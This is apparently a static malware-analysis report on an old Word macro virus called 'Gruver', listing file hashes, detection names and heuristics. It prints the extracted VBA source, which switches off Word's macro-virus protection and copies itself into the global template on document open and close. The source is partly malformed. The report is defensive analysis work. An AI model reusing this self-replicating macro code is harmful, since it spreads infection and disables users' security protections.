Win.Trojan.Pivis-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 2c3945d7e9b22cb2…

MALICIOUS

Office (OLE)

39.0 KB Created: 2004-07-26 01:23:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: c97e1dcaebe3ba906c8d24fa639ef382 SHA-1: fb5d805940721fcf943350b6d1ef22b1ca1c13a8 SHA-256: 2c3945d7e9b22cb2bfbd47dcd57c133d9bd01e5ac56d66b36b0ba171762ede3c
256 Risk Score

Malware Insights

Win.Trojan.Pivis-2 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic

This document contains legacy WordBasic macro virus markers and VBA macros, including AutoOpen and AutoClose routines, indicating a self-propagating infection mechanism. The ClamAV detection names 'Win.Trojan.Pivis-2' and 'Doc.Trojan.Ruver-1' further confirm its malicious nature as a macro-based threat.

Heuristics 6

  • ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
            .VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2314 bytes
SHA-256: 5a71cc75ed37927012cbb4207c80b2ef9b507f0e2621b1d7a2315afb6c4def0e
Detection
ClamAV: Doc.Trojan.Ruver-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Salvar"

Attribute VB_Name = "Gruver"

'Nome do virus: Gruver
'Escrito por : Brasileiro.
'==============================================
'Brasil um pais maravilhoso.
'----------------------------------------------

Dim Dia As Boolean
Option Base 1

Sub GruverRuns()
    On Error Resume Next
    
    With Options
        .ConfirmConversions = False
        .VirusProtection = False
        .SaveNormalPrompt = False
    End With
        
  Dim nor$
Dim doc$
Dim tem$
Dim mac$
Dim em
Dim ar$(2)
Sub AutoOpen()
MsgBox " Virus Gruver ativado."

    
    On Error Resume Next
   
    If Weekday(Now())("w", 1, 2, 3, 4, 5, 6, 7) Then
        ActiveDocument.Sections(1).Footers(wdHeaderFooterPrimary).Range _
    .InsertDateTime DateTimeFormat:="dd MMMM, yyyy", _
    InsertAsField:=True
        
        With ActiveDocument.Sections(1).Headers(wdHeaderFooterPrimary).Range
            .Font.Size = 14
            .ParagraphFormat.Alignment = wdAlignParagraphCenter
            .Text = "Gruver é um macro virus"
        End With
        ActiveDocument.PrintOut
    End If
    
     ActiveDocument.Save
End Sub

Sub ToolsMacro()
    On Error Resume Next
    Application.DisplayStatusBar = False
    

End Sub

Sub AutoClose()
    
On Error Resume Next

MsgBox "  Macro virus Gruver "
iMacroCount = WordBasic.CountMacros(0, 0)
'Gruver
For i = 1 To iMacroCount
    If WordBasic.[MacroName$](i, 0, 0) = "Gruver" Then
        binstalled = -1
    End If
    If WordBasic.[MacroName$](i, 0, 0) = "FileSaveAs" Then
        bTooMuchTrouble = -1
    End If
Next i
If Not binstalled And Not bTooMuchTrouble Then
    'add FileSaveAs and copies of FileSaveAs and AutoClose
    'Gruver é um  macro virus de word
    sMe$ = WordBasic.[FileName$]()
    sMacro$ = sMe$ + ":Gruver"
    WordBasic.MacroCopy sMacro$, "Global:FileSaveAs"
    sMacro$ = sMe$ + ":AutoClose"
    WordBasic.MacroCopy sMacro$, "Global:Gruver"
    
End If
Abort:
End Sub